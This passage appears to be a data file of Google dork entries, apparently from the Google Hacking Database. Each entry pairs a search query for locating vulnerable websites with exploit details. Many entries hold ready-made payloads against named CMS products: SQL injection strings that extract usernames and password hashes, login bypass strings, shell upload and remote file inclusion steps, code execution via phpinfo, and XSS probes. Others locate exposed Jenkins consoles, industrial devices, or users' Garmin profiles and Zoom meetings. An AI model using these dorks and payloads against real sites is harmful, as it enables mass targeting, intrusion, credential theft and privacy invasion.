http://server/index.php?option=com_catalogue&Itemid=73&cat_id=-999 union select 1,version(),user(),4,5,6"}, {"dork": "inurl:index.php?option=com_doqment&cid=", "description": "Author: KedAns-Dz http://server/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--"}, {"dork": "inurl:\"index.php?option=com_annuaire\"", "description": "SQL Injection Vulnerability: \n[+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]\n[+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--\nSubmitter: Ashiyane Digital Security Team"}, {"dork": "\"Powered By Dejcom Market CMS\"", "description": "Submitter:Mormoroth PoC: http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--"}, {"dork": "\"SOOP Portal 2.0\"", "description": "Submitted by: Net.Edit0r Shell Upload: https://www.exploit-db.com/exploits/15690"}, {"dork": "inurl:index.php?option=com_lqm \"showResults\"", "description": "Submitter: Snakespc SQL Injection: http://server/index.php?option=com_lqm&query=7&task=showResults&Itemid=158&lang=en&lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us"}, {"dork": "PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification", "description": "intitle:PhpMyAdmin inurl:error.php"}, {"dork": "inurl:page.php?intPageID=", "description": "Submitter: Srblche SQL Injection: http://server/page.php?intPageID=[SQL]"}, {"dork": "inurl:com_amresurrected", "description": "Submitter: Bl4ck.Viper SQL Injection: index.php?option=com_amresurrected&Itemid=[Sqli]"}, {"dork": "inurl:panorama-viewer.php?id=", "description": "[-] http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--\n[-] http://server/adm/users.php\n[-] http://server/adm/panorama_edit.php?id=1\n[-] http://server/listimages/shell.php\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor / \nHUrr!c4nE / Cair3x /novin security team and all iranian hackers\n#################################################################"}, {"dork": "inurl:showcat.asp?id=", "description": "========================================\nCentralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability\n========================================\n#################################################################\n# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability\n \n# Date : 10 December 2010\n \n# Author : ali.erroor\n \n# Version : n/a\n \n# Googel DorK : inurl:showcat.asp?id=\n \n# Home : www.network-security.ir\n \n# Email : ali.erroor@att.net\n \n#################################################################\n \n[+] Exploit\n \n[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..\n[-] http://localhost/path/admin/dbedit.asp?table=products\n \n[-] username : 'or''='\n[-] password : 'or''='\n[2] Create New Upload Your Shell.Asp ..\n[-] http://localhost/path/admin/dbedit.asp?a=upload_init\n \n[3] To See Shell Edit Your uploads\n[-] http://localhost/path/uploads/shell;asp.jpg\n \n[+] Demo\n[-] http://server/admin/dbedit.asp?table=products\n[-] http://server/admin/dbedit.asp?a=upload_init\n \n#################################################################\n \nGreat 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE \n/ Cair3x /novin security team and all iranian hackers\n#################################################################"}, {"dork": "\"POWERED BY: WEBINSPIRE\"", "description": "Author: ghost-dz SQL Injection: http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--"}, {"dork": "\"powered by simpleview CMS\"", "description": "Author: Sun Army XSS: /search/?searchString=\">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13"}, {"dork": "\"Powered By PageAdmin CMS Free Version\"", "description": "Author: Sun Army XSS: /include/search.aspx?keycode=\">xss ByTakpar&type=1&language=en"}, {"dork": "intext: Copyright+MantisBT Group", "description": "Mantis Bug Tracker\nhttp://mantisbt.org\nhttps://www.exploit-db.com/exploits/15735/\nhttps://www.exploit-db.com/exploits/15736/\nThanks,*\nGjoko 'LiquidWorm' Krstic*\n*Information Security Engineer*\n***Zero Science Lab*\nMacedonian Information Security Research & Development Laboratory\nhttp://www.zeroscience.mk\n+389 (0) 75 290 926\n+389 (0) 77 670 886"}, {"dork": "\"Powered by: IRIran.net\"", "description": "IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL] \nSubmitter: Ahoora"}, {"dork": "\"Powered by KaiBB 1.0.1\"", "description": "Multiple Vulnerabilities:https://www.exploit-db.com/exploits/15846/"}, {"dork": "inurl:\"/gadmin/index.php\"", "description": "Author: AtT4CKxT3rR0r1ST SQL Injection: www.site.com/gallery.php?id=null[Sql Injection]"}, {"dork": "inurl:\"com_eventcal\"", "description": "Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] RFI: www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]"}, {"dork": "\"Powered by phpMySport\"", "description": "intext:\"Powered by phpMySport\" Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15921/"}, {"dork": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "description": "Maximus CMS (FCKeditor) File Upload Vulnerability\nhttps://www.exploit-db.com/exploits/15960\nAuthor: eidelweiss"}, {"dork": "\"inurl:cultbooking.php\"", "description": "CultBooking Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16028/"}, {"dork": "intext:\"Powered by DZOIC Handshakes Professional\"", "description": "Author: IR-Security -Team\nSQL injection: http://server/administrator/index.php?section=manage_members&action=edit_photo&pho_id=-100001 union\nall select 1,version()--"}, {"dork": "inurl:\"/plugins/ImageManager/manager.php\"", "description": "Author: PenetraDz Shell Upload Vuln: manager/media/editor/plugins/ImageManager/manager.php"}, {"dork": "inurl:\"ab_fct.php?fct=\"", "description": "Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16044"}, {"dork": "\"made visual by sightFACTORY\"", "description": "Author : eXeSoul [#] http://server/accommodations.php?contentid=[sqli] [#] http://server/chamber_business.php?mid=[sqli] [#] http://server/work.php?mid=[sqli] [#] http://server/members.php?id=[SQLi]"}, {"dork": "\"Powered by SOFTMAN\"", "description": "Author: eXeSoul\n[i] \"Powered by SOFTMAN\" \n[ii] \"Powered by Softman Multitech Pvt Ltd\"\n[iii] \"All Rights reserved by SOFTMAN\"\nGo To Admin Panel :-\nAdmin: ' or 'x'='x Password: ' or 'x'='x"}, {"dork": "intext:\"Web Design by Webz\" filetype:asp", "description": "Submitter: p0pc0rn \nhttp://site.com/xxx.asp?id=[SQL] \nhttp://site.com/xxx.asp?catID=[SQL] \nhttp://site.com/xxx.asp?brandID=[SQL]"}, {"dork": "inurl:\"sitegenius/topic.php\"", "description": "Submitter: dR.sqL SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]"}, {"dork": "\"POWERED BY LOG1 CMS\"", "description": "Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16969/"}, {"dork": "ADAN (view.php ) Sql Injection Vulnerability", "description": "SQL Injection: https://www.exploit-db.com/exploits/16276/"}, {"dork": "intext:\"Site by Triware Technologies Inc\"", "description": "Submitter: p0pc0rn \nSQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]"}, {"dork": "intext:\"Powered by VoiceCMS\"", "description": "Submitter: p0pc0rn SQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]"}, {"dork": "intext:\"Powered by OnePlug CMS\"", "description": "Sumitter: p0pc0rn \nSQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a"}, {"dork": "intext:\"Powered by Inventory Mojo Software.\"", "description": "Submitter: p0pc0rn\nSQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp) \n---\nhttp://site.com/categoria.asp?CT=6' and '1'='1 TRUE http://site.com/categoria.asp?CT=6' and '1'='0 FALSE"}, {"dork": "\"site by Designscope\"", "description": "Submitter: Net.Edit0r \nSQL Injection: http://127.0.0.1/general.php?pageID=[SQL] http://127.0.0.1/content.php?pageID=[SQL]"}, {"dork": "index.php?option=com_ignitegallery", "description": "Submitter: TiGeR_YeMeN HaCkEr \nSQL Injection: index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--"}, {"dork": "intext:\"Powered by FXRecruiter\"", "description": "Submitter: Ashiyane Digital Security Team\nArbitrary File Upload: You must Register at site, Then in \"Upload CV Field\" Select and Upload Your File, then Using \"Live Http Header\" Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]"}, {"dork": "inurl:\"fbconnect_action=myhome\"", "description": "Submitter: z0mbyak \nSQL Injection: www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--"}, {"dork": "\"error_log\" inurl:/wp-content", "description": "Find various www readable Wordpress directories containing error logs with \r\n\r\nserver side debugging info, such as home path directory names, which are \r\n\r\noften the same user names for logging into the server over FTP and SSH.\r\n\r\n\r\n\r\nThis often exposes the path of the plug-ins installed in wordpress as well, \r\n\r\ngiving someone more information and avenues of attack since many Wordpress \r\n\r\nplug-ins can lead to compromises of the sites security. - DigiP"}, {"dork": "inurl:\"clsUploadtest.asp\"", "description": "Submitter: KDGCrew\nhttp://www.site.com/clsUpload/clsUploadtest.asp\nhttp://www.site.com/clsUpload/nameshell.php"}, {"dork": "\"Powered by SLAED CMS\"", "description": "Exploit Title: Slaed CMS Code exec\nOn different versions of this software next vulnerabilities are availible:\n/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view\n/index.php?name=Search&mod=&word=ok&query={${phpinfo()}}&to=view\nOR:\n/search.html?mod=&word={${phpinfo()}}&query=ok&to=view\n/search.html?mod=&word=ok&query={${phpinfo()}}&to=view"}, {"dork": "intitle:\"pChart 2.x - examples\" intext:\"2.1.3\"", "description": "The web application is vulnerable to Directory Traversal and XSS.\nThe version number can be omitted, all prior versions prior than 2.1.4\nare vulnerable.\nAdvisories and Vulnerabilities\nhttps://www.exploit-db.com/exploits/31173/\nhttp://www.pchart.net/advisory"}, {"dork": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled\nSearches for fckeditor default url and which has a config.asp file where configisenabled = true. Unable to search for true value directly because file contains 'example' which could lead to false positive. If found, traversing two directories up to /connectors/ should present an uploadtest.html file.\nThis may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits."}, {"dork": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "description": "This dork finds vulnerabel revslider plugins.\nIn reference to the exploit submitted by Adri\u00e1n M. F.\nhttps://www.exploit-db.com/exploits/37067/\nAuthor:NickiK."}, {"dork": "inurl:/wp-admin/post.php?post=", "description": "This dork finds websites which could be exploitable using Adri\u00e1n M. F.\nlanding page exploit - https://www.exploit-db.com/exploits/37108/\nAuthor:NickiK."}, {"dork": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "description": "Identifies Accellion Secure File Transfer servers that may be vulnerable to\nhttps://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857\n@lanmaster53"}, {"dork": "inurl:EndUserPortal.jsp", "description": "inurl:EndUserPortal.jsp \nIt takes you it brings up login pages for the service desk. \nhttps://www.exploit-db.com/exploits/37667/\nAuthor: NumLock90"}, {"dork": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "description": "Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sql\ninjection.\nhttps://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.html\nRegards,\nKaran Ramani"}, {"dork": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "description": "www.exploit-db.com/exploits/37275/\nDork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/\nsincerely,\nZeel Chavda"}, {"dork": "inurl:/wp-content/plugins/inboundio-marketing/", "description": "https://www.exploit-db.com/exploits/36478/\nGoogle Dork : inurl:/wp-content/plugins/inboundio-marketing/\nsincerely,\nZeel Chavda"}, {"dork": "allinurl:wp-content/plugins/wptf-image-gallery/", "description": "Description:- Aribtrary File Download Vuln.\nExploit :- www.exploit-db.com/exploits/37751/\nGoogle :- allinurl:wp-content/plugins/wptf-image-gallery/\nSincerely,\nZeel Chavda"}, {"dork": "\"ganglia mobile.php\"", "description": "EDB: https://www.exploit-db.com/exploits/38030/\nCVE: CVE-2012-3448\nAlso:\nintitle:\"Ganglia Mobile\"\nintitle:\"Ganglia\" inurl:\"mobile.php\"\nintitle:\"Grid Report\" OR intitle:\"Cluster Report\" OR intitle:\"Node View\" OR intitle:\"Host Report\" OR intitle:\"Ganglia:: \"\nintitle:\"Powered by Job Monarch\"\nintext:\"Job Monarch version \"\nintext:\"Jobarchive\" intext:\"runningtime\"\ninurl:\"/addons/job_monarch\" -oss.trac.surfsara.nl\n\"Ganglia Web Frontend version 3.5.0\" - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version."}, {"dork": "inurl:cgi-bin/webproc?getpage=", "description": "inurl:cgi-bin/webproc?getpage=\nhttps://www.exploit-db.com/exploits/38488/\nBy JeJe Plus"}, {"dork": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "description": "Search for all websites built on specific versions of Joomla CMS . These\nspecific versions of Joomla could potentially be vulnerable\nto the SQL injection attack (CVE-2015-7297) .\nThanks\nDheeraj"}, {"dork": "intitle:\"Dashboard [Jenkins]\" Credentials", "description": "Find Jenkins websites which do not require authentication to possibly\nretrieve credentials and obtain remote command execution.\nVulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html\n- Th3R3p0"}, {"dork": "inurl:/node/add/event", "description": "Dorks For Drupal HTML& Arbitrary File Upload Vulnerabilities\ninurl:/node/add/event\ninurl:/node/add/announcement\nThis Dork Original By Mr.XSecr3t :p\nNO COPAS brooh :v\n~GAME OVER~"}, {"dork": "inurl:\".asp?strParents=\"", "description": "Author: Charley Celice (@charleycelice)\n99% of sites I found using this dork are vulnerable to XSS attacks. The\n\"strParents\" parameter seems to always be injectable.\nExample:\nhttps://example/whatever.asp?strParents=\n\"/>&CAT_ID=1337&whatever=1337&etc...\n-stmerry"}, {"dork": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com", "description": "inurl:\"/webmail/\" intitle:\"Mail - AfterLogic WebMail\" -site:afterlogic.org -site:afterlogic.com\nAfterLogic WebMail\nXXE Injection Vulnerability\nhttps://www.exploit-db.com/exploits/39850/\nDecoy"}, {"dork": "ext:php inurl:\"api.php?action=\"", "description": "ext:php inurl:\"api.php?action=\"\nXenAPI/XenForo SQLi Vulnerability\nhttps://www.exploit-db.com/exploits/39849/"}, {"dork": "intext:\"Forum software by XenForo\u2122\"", "description": "intext:\"Forum software by XenForo\u2122\"\nXenForo SQLi Vulnerability. - https://www.exploit-db.com/exploits/39849/\n\"value\" parameter unsanitized."}, {"dork": "inurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php", "description": "WP Mobile Detector 3.5 Remote Shell Upload\nhttps://www.exploit-db.com/exploits/39891/\ninurl:\"/wp-content/plugins/wp-mobile-detector/\" ext:php\nDecoy"}, {"dork": "inurl:\"/wp-content/uploads/levoslideshow/\"", "description": "Webshell Upload.\nWordpress Levo-Slideshow 2.3\ninurl:\"/wp-content/uploads/levoslideshow/\"\nDecoy"}, {"dork": "intext:\"Hello visitor from\" ext:asp", "description": "intext:\"Hello visitor from\" ext:asp\natawho - sonadam - antidote\ndetails\nhttps://monodram.net/2015/10/10/user-agent-xss-inj.html"}, {"dork": "\"index of\" bigdump.php", "description": "Search for BigDump: Staggered MySQL Dump Importer file\n- Arbitrary Upload\n- Juicy info/passwords\n- Deleting files\n- MySQL injection"}, {"dork": "inurl:sgms/auth", "description": "inurl:sgms/auth\nThis will allow you to find Sonicwall GMS servers.\nThis article mentions 6 vulnerabilities recently found.\nhttps://www.digitaldefense.com/vrt-discoveries/"}, {"dork": "inurl:/index.php?option=com_artforms", "description": "# Exploit Title : ----------- :Joomla \"com_artforms\" component SQL Injection\n# Author : ----------------- : importantTR\n# Google Dork : --------- : -inurl:/index.php?option=com_artforms\n# Date : -------------------- : 20/01/2017\n# Platform : --------------- : Joomla\n ########## 1-SQL Injection ##########\nindex.php?option=com_artforms&task=ferforms&viewform=[SQLi]\n##### SQLi Parameter :\n/index.php?option=com_artforms&task=ferforms&viewform=-1%20UNION%20SELECT%201,concat_ws%280x4a,username,password%29,3,4,5,6%20from%20jos_users%23\n########## AYYILDIZ TIM ##########\nhttps://www.exploit-db.com/exploits/14263/"}, {"dork": "inurl:sendmessage.php?type=skype", "description": "Dork to find Joomla JMS Support Online Module Reflected XSS (skype module)\nType: Reflected XSS\nVulnerable URL:http://localhost/[PATH]/sendmessage.php\nVulnerable Parameters: ?type=skype&user=&skype=\nMethod: GET\nPayload: \">"}, {"dork": "\"CF-Host-Origin-IP\" \"CF-Int-Brand-ID\" \"CF-RAY\" \"CF-Visitor\" \"github\" -site:github.com -site:cloudfare.com", "description": "Dork:\n\"CF-Host-Origin-IP\" \"CF-Int-Brand-ID\" \"CF-RAY\" \"CF-Visitor\" \"github\"\n-site:github.com -site:cloudfare.com\nReplace \"github.com\" with any of the other Cloudfare servers as can be\nfound here.\nhttps://github.com/pirate/sites-using-cloudflare\nLook at cached results for data leaked from memory due to \"Cloudbleed\"\nvulnerability.\nhttps://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/"}, {"dork": "inurl:\"/admin/index.php?msg=\" inurl:\"%20\"", "description": "Finds pages that can be XSS'd and edited\r\n\r\n\r\n\r\ne.g.: http://www.site.com/admin/index.php?msg=Click me!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"exit.php?site=\"", "description": "Finds files that let you redirect users to any site!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/testssi.ssi\"", "description": "*Google dork description: *Xitami servers distributed with a script for\r\ntesting server-side includes, '/testssi.ssi'. This script is vulnerable to\r\na cross-site scripting issue when sent a request with a malformed Host or\r\nUser-Agent header. An attacker may exploit this flaw the steal the\r\nauthentication credentials of third-party users.\r\n\r\n*Google Search: *inurl:\"/testssi.ssi\"\r\n\r\n*Submitted by:* Alfie_the-infosec_"}, {"dork": "inurl:\"mgl-instagram-gallery/single-gallery.php?media\"", "description": "This Dork, helps us find websites, which contain the mgl-instagram-gallery plugin of WordPress Vulnerable to XSS\r\n\r\ninurl:\"mgl-instagram-gallery/single-gallery.php?media\"\r\n\r\nDrok3r"}, {"dork": "intitle:\"Nport web console\"", "description": "Vulnerable moxa devices can be identified with the following dork\r\n\r\nintitle:\"Nport web console\"\r\n\r\nreference:https://ics-cert.us-cert.gov/advisories/ICSA-17-355-01"}, {"dork": "intitle:\"WAGO Ethernet web-based-management\"", "description": "Vulnerable Wago devices can be identified with the following dork\r\n\r\nintitle:\"WAGO Ethernet web-based-management\"\r\n\r\nReference: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-341-01\r\n\r\nThanks,\r\n\r\nMudassar"}, {"dork": "\"Powered by 2Moons\"", "description": "Find websites using 2Moons ogame software.\r\n\r\nhttps://www.exploit-db.com/exploits/37713/"}, {"dork": "inurl:\"/uddiexplorer/searchpublicregistries.jsp\"", "description": "Category: Page containing log in portal & Web Server Detection\r\n\r\nDescription: This dork allows user to access default page of Oracle\r\nWeblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF\r\nvulnerability for weblogic uddi explorer. Moreover, there is a flaw\r\nregarding the weblogic server version which vulnerables to XSS.\r\n\r\nReference:\r\nhttps://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "inurl=\"/uddiexplorer/SetupUDDIExplorer.jsp\"", "description": "Category: Page containing log in portal & Web Server Detection\r\n\r\nDescription: This dork allows user to access default page of Oracle Weblogic Server - UDDI Explorer. Some of scanner tools would detect SSRF vulnerability for weblogic uddi explorer. Moreover, there is a flaw regarding the weblogic server version which vulnerables to XSS.\r\n\r\nReference: https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "inurl:wls-wsat intext:\"weblogic.wsee.wstx.wsat\"", "description": "Finds weblogic wl-wsat services endpoints prone to XML deserialization\r\nRemote Command Execution - CVE-2017-10271\r\n\r\nDork: inurl:wls-wsat intext:\"weblogic.wsee.wstx.wsat\"\r\n\r\nCheers. Sh3llb0y"}, {"dork": "site:www.openbugbounty.org + intext:\"Open Redirect\" + intext:\"Unpatched\"", "description": "Dork : site:www.openbugbounty.org + intext:\"Open Redirect\" + intext:\"Unpatched\"\r\n\r\nDescription : this dork gives you all unpatched sensitive websites\r\nvulnerable to open redirect\r\n\r\nAuthor : botsec0"}, {"dork": "intext:\"Powered by 74cms v5.0.1\"", "description": "# Google Dork: intext:\"Powered by 74cms v5.0.1\"\r\n# Description: Google Dork to find the pages vulnerable to CVE-2019-10684\r\n# Date: 04-16-2019\r\n# Author: Rahul B Pallickal\r\n# Contact: https://www.linkedin.com/in/rahulbpkl/"}, {"dork": "inurl:dnn.js", "description": "inurl:dnn.js Reveals Raw Javascript of the Dot Net Nuke CMS of websites that may be vulnerable to XSS ( CVE-2013-4649 ) via searching the page text for the string ' Type.registerNamespace(\"dnn\") ' .\r\n\r\nVulnerable versions: \r\n- DNN 7.1.0 and earlier\r\n- DNN 6.2.8 and earlier\r\n\r\nPOC: http://www.vulnerable.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}"}, {"dork": "site:connect.garmin.com inurl:\"/modern/profile/\"", "description": "Obtain profiles of users of the social network for sportsmen Garmin \r\nConnect.\r\n\r\nReference: \r\nhttp://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect_24.html\r\n\r\nAuthor: Amador Aparicio, @amadapa"}, {"dork": "site:connect.garmin.com inurl:\"/modern/activity/\"", "description": "Obtain URLs of the sports activities of users of the social network for \r\nGarmin Connect athletes,\r\n\r\nReference: \r\nhttps://www.elladodelmal.com/2019/04/hacking-fitness-via-garmin-connect.html \r\n\r\n\r\nAuthor: Amador Aparicio, @amadapa"}, {"dork": "intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" | \"netsparker\" | \"nmap\") filetype:pdf", "description": "This dork allows identification and detection of\r\nvulnerabilities arising from mis-configurations or flawed programming\r\nwithin a network-based asset such as a firewall, router, web server,\r\napplication server, etc from already scanned reports.\r\n\r\n*Google Dork :* intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" |\r\n\"netsparker\" | \"nmap\") filetype:pdf\r\n\r\n*Exploit Author*:- Deepak Joshi"}, {"dork": "inurl:/secure/ContactAdministrators!default.jspa intext:\"Request Details\" -intext:\"Your Jira administrator has not yet configured this contact form\"", "description": "Dork: inurl:/secure/ContactAdministrators!default.jspa intext:\"Request\r\n\r\nDetails\" -intext:\"Your Jira administrator has not yet configured this\r\ncontact form\"\r\n\r\nCategory : Vulnerable Servers\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about Jira servers that may\r\nvulnerable to Template injection vulnerability [CVE-2019-11581]. \r\n\r\n*Dork discovered by:* *Sachin Wagh (@tiger_tigerboy)*\r\nReference:\r\n\r\nhttps://twitter.com/tiger_tigerboy/status/1151011237414629376"}, {"dork": "inurl:zoom.us/j and intext:scheduled for", "description": "Dorks:\r\n\r\ninurl:zoom.us/s\r\ninurl:zoom.us/j\r\ninurl:zoom.us/j and intext:scheduled for\r\n\r\nCategory : Sensitive Information\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about Zoom Meetings. *Dork\r\ndiscovered by:* *Sachin Wagh (@tiger_tigerboy)*"}, {"dork": "intext:Powered By vBulletin 5.5.4 inurl:forum.", "description": "Category: Advisories and Vulnerabilities\r\n\r\nAuthor: IdeaEngine007"}, {"dork": "inurl:\"index.cfm?action=\" intext:\"Exception in onError\"", "description": "I have found a vulnerability in error page of coldfusion,\r\n\r\nName of author: Marcos Almeida\r\n\r\nPoC\r\n\r\nXSS\r\nhttps://victimwebsite.com/?action=./ERROR?\">&fw1pk=3\r\n\r\nHTMLI\r\nhttps://victimwebsite.com/?action=./ERROR?\">ERROR&fw1pk=3"}, {"dork": "intext:\"Please enable JavaScript in your browser before using Citrix Receiver.\" AND intext:www.citrix.com", "description": "Description: Search for Citrix Gateway servers that could potentially be\r\nvulnerable to CVE-2019-19781\r\n\r\nAuthor: Ahmad Al-Nounou\r\n\r\nLinkdeIn: https://www.linkedin.com/in/ahmadalnounou/"}, {"dork": "intitle:\"kentico database setup\"", "description": "# Exploit Title: Google Dork for Kentico CVE-2017\u201317736\r\n# Google Dork: intitle:\"kentico database setup\"\r\n# Date: January 21, 2020\r\n# Exploit Author: Nathan Potter\r\n# Version: Kentico 8.X,"}, {"dork": "inurl:/cmsinstall/install ext:aspx", "description": "# Exploit Title: Google Dork for Kentico CVE-2017\u201317736\r\n# Google Dork: inurl:/cmsinstall/install ext:aspx\r\n# Date: January 21, 2020\r\n# Exploit Author: Nathan Potter\r\n# Version: Kentico 8.X,"}, {"dork": "inurl:ReportViewer.aspx", "description": "Dork: inurl:ReportViewer.aspx\r\nDate: 19 Feb 2020\r\nAuthor: rhinofense.com\r\n\r\nSearch for SSRS servers vulnerable to RCE (CVE-2020-0618)"}, {"dork": "\"Powered by Zimplit CMS\"", "description": "#Google Dork: \"Powered by Zimplit CMS\"\r\n\r\n# By using this dork, sites \"Powered by Zimplit CMS\" can be found. Zimplit\r\nCMS is prone to multiple cross-site-scripting vulnerabilities because it\r\nfails to properly sanitize user-supplied input. This is linked to the\r\nfollowing exploit: https://www.exploit-db.com/exploits/35063\r\n\r\n# Date: 30/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by sNews CMS\"", "description": "# Google Dork: \"Powered by sNews CMS\"\r\n\r\n# By using this dork, sites \"Powered by sNews CMS\" can be found. The\r\nvulnerability exists due to failure in the \"snews.php\" script to properly\r\nsanitize user-supplied input in \"website_title\" variable. Successful\r\nexploitation of this vulnerability could result in a compromise of the\r\napplication, theft of cookie-based authentication credentials, disclosure\r\nor modification of sensitive data.\r\nThis dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/15295\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by Podcast Generator\"", "description": "# Google Dork: \"Powered by Podcast Generator\"\r\n\r\n# By using this dork, sites \"Powered by Podcast Generator\" can be found.\r\nThe vulnerability exists due to failure in the \"/core/episode.php\" script\r\nto properly sanitize user-supplied input in \"name\" variable, it's possible\r\nto generate an error that will reveal the full path of the script. A remote\r\nuser can determine the full path to the web root directory and other\r\npotentially sensitive information. This dork is linked to the following\r\nexisting exploit: https://www.exploit-db.com/exploits/16109\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered By Liferay\"", "description": "# Google Dork: \"Powered By Liferay\"\r\n\r\n# By using this dork, sites \"Powered By Liferay\" can be found. Liferay\r\nPortal various versions are prone to multiple cross-site scripting\r\nvulnerabilities. This dork is linked to the following existing exploits:\r\nhttps://www.exploit-db.com/exploits/39626\r\nhttps://www.exploit-db.com/exploits/46983\r\nhttps://www.exploit-db.com/exploits/39880\r\nhttps://www.exploit-db.com/exploits/31082\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by SePortal 2.5\"", "description": "# Google Dork: \"Powered by SePortal 2.5\"\r\n\r\n# By using this dork, sites \"Powered by SePortal 2.5\" can be found.\r\nSePortal 2.5 is prone to an Sql Injection Vulnerability. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/32359\r\n\r\n# Date: 1/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by PHPBack\"", "description": "# Google Dork: \"Powered by PHPBack\"\r\n\r\n# By using this dork, sites \"Powered by PHPBack\" can be found. PHPBack\r\nv1.3.0 is vulnerable to Boolean blind and error based SQL Injection in the\r\n'orderby' parameter. By sending SQL Injection query using MySQL XPATH\r\nfunction ExtractValue() we can grab information from the errors generated.\r\nThis dork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/39711\r\n\r\n# Date: 07/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"Powered by Lanius CMS\"", "description": "# Google Dork: \"Powered by Lanius CMS\"\r\n\r\n# By using this dork, sites \"Powered by Lanius CMS\" can be found. Lanius\r\nCMS various versions are prone to multiple SQL Injection vulnerabilities.\r\nThis dork is linked to the following existing 